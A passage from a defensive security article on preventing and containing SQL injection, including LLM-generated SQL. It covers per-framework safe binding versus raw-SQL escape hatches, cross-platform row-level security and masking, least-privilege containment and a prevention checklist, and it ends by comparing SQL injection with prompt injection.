Allowlist deliberately and deny by default, not just "no writes": permit only specific tables, columns, joins, operators, and callable functions, since a read-only role can still invoke expensive, leaky, or side-effecting functions depending on the engine and config. Block the control surface too, not only data changes: FOR UPDATE and LOCK TABLE, advisory locks, SET, transaction-control commands, and optimizer hints have no business in a generated read query, so reject them rather than assuming "read-only" already covers them.

Enforce row and tenant policy in the database underneath all of it, and cap output. Remember the slower exfiltration path: even with per-query output capped, an agent can page through and summarize sensitive rows across many turns, so the policy also has to bound the conversation or session budget, repeated paging over the same data, and what the model is permitted to reveal, not just the size of one result.

Mind what your rejections say, as well. A detailed "unknown column x in table y" or "policy z blocked this" hands the model, or whoever is steering it, a free map of your schema and rules. Log the rich reason internally and return a bland error outward. And keep human approval in its place: it is for exceptional, policy-permitted workflows, not the control that stands between a generated DROP and your data; the app role should make that statement unrunnable in the first place.

The escape hatches, by framework

Every ORM and query builder binds values for you on its normal path, and every one ships a raw escape hatch that does not. The rule is the same across all of them: stay on the typed API, and when you genuinely need raw SQL, bind through it rather than interpolating. The middle column is what to grep for in review; the last column is the correct way to use raw SQL when you must.

Reference Safe API, Dangerous Hatch, Correct Bind Per framework: the binding path, the hatch that bypasses it, and how to bind raw SQL when you must drop to it.
Framework Safe API (binds for you) Dangerous escape hatch Correct raw-SQL bind
Django filter(col=v) .raw(), .extra(), RawSQL .raw("...WHERE id=%s", [v])
SQLAlchemy where(Col==v) text("..."+v) text("...=:v").bindparams(v=v)
Rails / ActiveRecord where(col: v) where("...#{v}"), Arel.sql, find_by_sql where("col = ?", v)
Laravel / Eloquent where('col', $v) whereRaw("...$v"), DB::raw whereRaw('col = ?', [$v])
Prisma where: { col: v } $queryRawUnsafe, $executeRawUnsafe, Prisma.raw tagged $queryRaw / $executeRaw, Prisma.sql
Knex where({ col: v }) whereRaw("..."+v), knex.raw(str) whereRaw('col = ?', [v])
TypeORM find({ where: { col: v } }) .query(str), where("..."+v) where("col = :v", { v })
Sequelize findAll({ where: { col: v } }) query("..."+v), literal() query("...=$1", { bind: [v] }); replacements only escapes (not bound)
Hibernate / JPA Criteria API, cb.equal(...) string-built HQL / JPQL setParameter("v", v) on a named param
MyBatis #{v} (bound parameter) ${v} (string substitution) #{v} for values; allowlist any ${} structure
Dapper Query(sql, new { v }) interpolation into sql Query("...=@v", new { v })
JDBC PreparedStatement with ? Statement + concatenation ps.setString(1, v)
EF Core Where(x => x.Col == v) FromSqlRaw(str), ExecuteSqlRaw(str) FromSql($"...{v}") (EF Core 7+), FromSqlInterpolated / ExecuteSqlInterpolated (earlier, and for commands)

Note: read the Dapper row carefully. Unlike the ORMs above it, Dapper does not build SQL for you, so it is not "safe by default," it is safe only when the SQL text is static and every value is passed as a parameter. Interpolate user input into the command string and it runs exactly what you wrote. The same holds for JDBC and any raw layer: the safety is in a constant SQL string plus bound values, not in the library itself.

Containment architecture: assume one gets through

Parameterization is the control; containment decides what a missed one costs. "Least privilege" is the headline, but in practice it is an architecture, not a single GRANT.

Containment layers around the data Concentric layers of defense, egress control, a least-privilege role, views and row-level security, and encryption at the center, bound how far a single missed query can reach. EGRESS CONTROL LEAST-PRIVILEGE ROLE VIEWS + RLS encrypted data ONE MISSED QUERY
If parameterization fails, each layer bounds how far the query reaches, and the data at the center stays encrypted.

The mechanics above are PostgreSQL's, because it exposes the most of this surface in the open, but every major platform has direct equivalents. Map them across before assuming a control is Postgres-only:

Reference Containment Controls, Cross-Platform The same row, column, and elevated-execution boundaries, by engine.
Platform Row filtering Column hide / mask Delegated / elevated access to audit
PostgreSQLRLS policies (USING / WITH CHECK), FORCE RLScolumn GRANTs, security_invoker / security_barrier viewsSECURITY DEFINER functions
SQL ServerRow-Level Security (security policies + predicates)Dynamic Data Masking, column GRANT, viewsEXECUTE AS, ownership chaining
OracleVPD (DBMS_RLS policies)Data Redaction, viewsdefiner-rights (AUTHID DEFINER) packages
Snowflakerow access policiesmasking policies, secure viewsowner's-rights procedures; external functions / external access integrations
BigQueryrow access policiespolicy tags (column-level), authorized viewsauthorized views and routines
Databricks (Unity Catalog)row filterscolumn masksdynamic views; external-location governance

One caveat on the masking column: masking is not encryption and not a substitute for revoking access to the base objects. Depending on the platform and the grants, a role with broad or ad hoc query privileges can often infer or bypass masked values, so treat masking as a presentation-layer control on top of real access revocation, not as the boundary itself.

Each layer holds even when the code does not. Containment starts from the assumption that a query will be built wrong some day, and arranges things so that day is survivable.

Proving you actually did it

Writing the defense is one thing; proving on demand that it is real, and stays real, is another. A verification program for injection has a few moving parts:

Keep the line between the two environments clear: active exploitation tooling (sqlmap, fuzzers, injected payloads) belongs on staging. In production, verification is passive, telemetry, canaries, and rate and query-shape signals that flag an attack without becoming one. Do not point active scanners at production traffic or data.

Make one rule non-negotiable and most of this enforces itself: every piece of dynamic SQL must reference a named allowlist. If a query varies its structure and there is no allowlist next to it, that is the finding, before anyone even tries to exploit it.

When it happens anyway

MOVEit is the reminder that one missed query can mean full compromise, so the response plan matters as much as prevention. If you suspect SQL injection has been exploited, the checklist runs roughly:

None of this is possible after the fact unless the logging and egress controls were already in place. That is the real reason to build containment before you need it, not during the incident.

The whole thing on one card

If you keep one artifact from this piece, keep this. Each line is a section above, compressed to the thing you actually do. It is also on the downloadable fix-and-prevent cheat sheet if you would rather print it:

Build it right

  • Bind values. Parameterize every value, everywhere, including inside dynamic SQL and stored procedures.
  • Allowlist structure. Identifiers, sort, operators, and grammars map to a fixed set you defined; never trust raw input for them.
  • Disable emulation and multi-statements where you can, so escaping traps and stacked queries are off the table.
  • Constrain generated SQL. Prefer a model-emitted intent/DSL compiled by a deterministic builder; if raw SQL is unavoidable, AST-allowlist it inside a read-only sandbox and cap the session and output budget.
  • Test the raw-query escape hatches and pin driver config so an upgrade cannot reopen a hole.

Lock down privileges

  • Least privilege on the app role: no DDL, no file, no OS, scoped to its schema.
  • Lock down function execution. Revoke EXECUTE and PUBLIC/default grants; an unsafe function is as good as a table grant.
  • Separate runtime from owner, and watch SECURITY DEFINER and search_path.

Contain the blast radius

  • RLS and views for containment, set up correctly, so a missed query still cannot cross tenants or read what you withheld.
  • Expose views and APIs, not base tables. Revoke the app role's direct base-table grants so injection cannot query around the view.
  • Fail closed on tenant context. Missing or unset app.tenant_id returns no rows or errors, never a default tenant.
  • Tokenize or encrypt the highest-value fields with keys the database role cannot reach, so a successful read returns opaque bytes, not plaintext.
  • Control egress from the database host to kill the out-of-band exfiltration class.
  • Add timeouts and caps to blunt blind extraction and bulk pulls.

Detect and respond

  • Monitor catalog, time, and file probes, at the database and the app, not just the WAF.
  • Preserve evidence first on an incident, before rotation wipes the answer to "what changed?"
  • Treat exposed secrets as burned. Invalidate sessions, force password resets, rotate tokens and keys; out-of-band and UNC paths can leak credentials, not just data.

Why a 1998 bug still runs 2026's breaches

SQL injection is the rare class that is both completely understood and completely endemic. The reason is not ignorance of the fix. The headline cause is that the fix is "parameterize values," and real applications must vary query shape: sorts, filters, searches, reports, and generated queries. Those are the parts parameterization cannot reach. But the survival of the bug is also operational, as this article has traced: driver defaults that drift on upgrade, privileges that creep, background jobs and second-order paths nobody tests, generated SQL from a model, and verification that never reaches the authenticated paths where it hides. Those gaps are where injection survives, and they are also the corners cut under deadline.

Step back and SQL injection and prompt injection are the same boundary failure at different layers: trusted instructions and untrusted data sharing one channel. The difference is that databases handed us a real boundary, the prepared statement, that separates the two at the protocol level, and even with that boundary in hand the bug never went away, because it does not reach the parts of SQL that have to vary. The lesson carries straight into AI security: an enforceable boundary is the best thing a platform can give you, and it only protects the places you actually use it.

References and further reading

The specifics above are drawn from the standards bodies, primary documentation, and research that define and document this class. Worth keeping close: